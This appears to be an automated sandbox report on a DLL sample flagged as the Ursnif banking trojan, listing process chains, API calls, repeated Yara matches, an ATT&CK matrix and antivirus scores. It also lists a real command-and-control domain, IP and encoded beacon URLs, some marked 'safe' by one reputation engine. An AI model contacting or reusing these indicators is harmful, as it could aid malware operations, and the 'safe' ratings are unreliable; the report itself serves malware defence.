Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED

Source: C:\Windows\System32\loaddll32.exe

Section loaded: mspdb140.dll

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_100021A4
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00FA40B3
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00FAAF44

Source: 2e.dll

Static PE information: invalid certificate

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10001C22 GetProcAddress,NtCreateSection,memset,
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10001AD1 NtMapViewOfSection,
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10001252 GetLastError,NtClose,
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_100023C5 NtQueryVirtualMemory,
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00FA7925 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00FAB169 NtQueryVirtualMemory,

Source: 2e.dll	Virustotal: Detection: 65%
Source: 2e.dll	Metadefender: Detection: 40%
Source: 2e.dll	ReversingLabs: Detection: 82%

Source: 2e.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_00FA229C CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\2e.dll',#1

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\2e.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\2e.dll',#1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\2e.dll',#1
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6632 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3684 CREDAT:17410 /prefetch:2
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\2e.dll',#1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\2e.dll',#1
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6632 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3684 CREDAT:17410 /prefetch:2

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{C2243AE9-2779-11EC-90EB-ECF4BBEA1588}.dat

Jump to behavior

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DF302033FC2C26A542.TMP

Jump to behavior

Source: classification engine

Classification label: mal100.troj.winDLL@11/19@2/1

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10002193 push ecx; ret
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10002140 push ecx; ret
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00FAE6BE push esp; retf
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00FAAC00 push ecx; ret
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00FAE1AF push ebx; ret
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00FAE163 push edx; iretd
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00FAAF33 push ecx; ret
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D5BAD0 push edx; ret
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D53C54 push eax; iretd
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D53C32 push eax; iretd
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D5197F push ds; retf
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D516B6 push ecx; ret
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D552B6 push esp; iretd
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D55EB0 push 0E0634C7h; retf
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D53205 push cs; retf
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D53FFB pushad ; iretd
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D533A6 push ds; ret

Source: 2e.dll

Static PE information: section name: .data2

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.803227069.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899624754.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899679328.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803315900.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899458212.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899498607.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899414511.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.901603317.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1203601349.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803348643.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803173940.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803390693.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899563679.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803371540.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899592894.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803277362.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803130026.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899658912.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 796, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4872, type: MEMORYSTR
Source: Yara match	File source: 0.2.loaddll32.exe.e00000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.30e0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.e00000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.2f90000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.2f40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.4ce94a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.31494a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.30e0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.2f90000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.d60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.10000000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.fa0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.10000000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.31494a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.4ce94a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.d60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1203692566.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.901240382.0000000002F90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1203393631.0000000003149000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.901405735.00000000030E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.901669349.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1202749084.0000000000D60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.900182748.0000000004CE9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1202777990.0000000000E00000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\loaddll32.exe

Memory protected: page execute read | page guard

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\2e.dll',#1

Source: loaddll32.exe, 00000000.00000002.1203164560.0000000001760000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: loaddll32.exe, 00000000.00000002.1203164560.0000000001760000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.1203164560.0000000001760000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.1203164560.0000000001760000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe

Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_00FA8B98 cpuid

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_1000166F CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_10001000 GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_00FA8B98 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.803227069.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899624754.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899679328.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803315900.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899458212.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899498607.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899414511.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.901603317.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1203601349.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803348643.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803173940.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803390693.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899563679.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803371540.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899592894.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803277362.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803130026.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899658912.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 796, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4872, type: MEMORYSTR
Source: Yara match	File source: 0.2.loaddll32.exe.e00000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.30e0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.e00000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.2f90000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.2f40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.4ce94a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.31494a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.30e0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.2f90000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.d60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.10000000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.fa0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.10000000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.31494a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.4ce94a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.d60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1203692566.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.901240382.0000000002F90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1203393631.0000000003149000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.901405735.00000000030E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.901669349.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1202749084.0000000000D60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.900182748.0000000004CE9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1202777990.0000000000E00000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.803227069.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899624754.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899679328.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803315900.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899458212.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899498607.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899414511.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.901603317.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1203601349.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803348643.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803173940.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803390693.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899563679.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803371540.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899592894.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803277362.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803130026.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899658912.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 796, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4872, type: MEMORYSTR
Source: Yara match	File source: 0.2.loaddll32.exe.e00000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.30e0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.e00000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.2f90000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.2f40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.4ce94a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.31494a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.30e0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.2f90000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.d60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.10000000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.fa0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.10000000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.31494a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.4ce94a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.d60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1203692566.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.901240382.0000000002F90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1203393631.0000000003149000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.901405735.00000000030E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.901669349.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1202749084.0000000000D60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.900182748.0000000004CE9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1202777990.0000000000E00000.00000040.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation2	DLL Side-Loading1	Process Injection12	Masquerading1	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	DLL Side-Loading1	Disable or Modify Tools1	LSASS Memory	Process Discovery2	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection12	Security Account Manager	Account Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information1	NTDS	System Owner/User Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Rundll321	LSA Secrets	File and Directory Discovery2	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Software Packing1	Cached Domain Credentials	System Information Discovery33	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	DLL Side-Loading1	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
2e.dll	66%	Virustotal		Browse
2e.dll	41%	Metadefender		Browse
2e.dll	83%	ReversingLabs	Win32.Trojan.Ursnif
2e.dll	100%	Avira	TR/AD.Ursnif.rluee

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
2.2.rundll32.exe.30e0000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen8	Download File
0.2.loaddll32.exe.e00000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen8	Download File
2.2.rundll32.exe.10000000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen8	Download File
0.2.loaddll32.exe.10000000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen8	Download File

Domains

Source	Detection	Scanner	Label	Link
api10.laptok.at	14%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://api10.laptok.at/api1/9cxo6IB1Y7pDV3pIFs/pxY2OU074/uQoS3fQTrkAvwEYVEAv9/V9besIl3CRfg1NE1PHO/5acsxz5qxHDpv8YBmMuvj7/KGpLxQcloIDfE/SXYboMNK/ZGVNwVWGfnWgXZ7LibENrAZ/rGu1uarUfj/FSkhkIGZ0I6ED2ThT/iotSrHt6InUD/umvaUlfqIMb/01G4_2FdSHt_2F/JPI5oPhpcVsnT5eUGv8s0/LSKuaJdd_2FAe_2F/vQT2v29m9TEniEM/b63Yg6FSycj4oUXo8F/FUMOEIDKM/JTkYuf9RIKrVWGrferoc/GwDXbtZ7LjM2klfVose/Bk9CRR6n/Lu2z5l	0%	Avira URL Cloud	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://api10.laptok.at/api1/9cxo6IB1Y7pDV3pIFs/pxY2OU074/uQoS3fQTrkAvwEYVEAv9/V9besIl3CRfg1NE1PHO/5a	0%	Avira URL Cloud	safe
http://api10.laptok.at/api1/DGBXE3uXrLTWiBjVyk/VC7Ta4hFF/xsAyuQ20ayjuhLgkiSkm/m3K_2FmdKtkRCW_2B7u/tX	0%	Avira URL Cloud	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe
http://api10.laptok.at/api1/9cxo6IB1Y7pDV3pIFs/pxY2OU074/uQoS3fQTrkAvwEYVEAv9/V9besIl3CRfg1NE1P	0%	Avira URL Cloud	safe
http://www.wikipedia.com/	0%	URL Reputation	safe
http://api10.laptok.at/favicon.ico	0%	Avira URL Cloud	safe
http://api10.laptok.at/api1/DGBXE3uXrLTWiBjVyk/VC7Ta4hFF/xsAyuQ20ayjuhLgkiSkm/m3K_2FmdKtkRCW_2B7u/tXHmCyMHbP9slqB1L8zpaC/nfhvJ6s58irru/pNJBMQ_2/B9Q8wSf7euVWpy0kLFFtWzz/vAwDCO_2Fo/3v4FyeGSRuSjMupWH/_2BEQ6znA7PT/8caxgyO1tr2/cTDPOBy_2FHAvv/tgKZ2JSY8uZo5PCTnq6VX/_2F2Vff20_2Fr9ux/TFmLX_2BIHd1Zmp/Jqw_2BLpi2pH8Zi61P/xEqI3ryES/n6BjkuL3N3RbBmMCK9xy/loeot0z7U9fUAU78A6C/ywgL0kQB0_2BMve6S_2Flf/2SujN_2Fl/B	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api10.laptok.at	87.106.18.141	true	true	14%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://api10.laptok.at/api1/9cxo6IB1Y7pDV3pIFs/pxY2OU074/uQoS3fQTrkAvwEYVEAv9/V9besIl3CRfg1NE1PHO/5acsxz5qxHDpv8YBmMuvj7/KGpLxQcloIDfE/SXYboMNK/ZGVNwVWGfnWgXZ7LibENrAZ/rGu1uarUfj/FSkhkIGZ0I6ED2ThT/iotSrHt6InUD/umvaUlfqIMb/01G4_2FdSHt_2F/JPI5oPhpcVsnT5eUGv8s0/LSKuaJdd_2FAe_2F/vQT2v29m9TEniEM/b63Yg6FSycj4oUXo8F/FUMOEIDKM/JTkYuf9RIKrVWGrferoc/GwDXbtZ7LjM2klfVose/Bk9CRR6n/Lu2z5l	true	Avira URL Cloud: safe	unknown
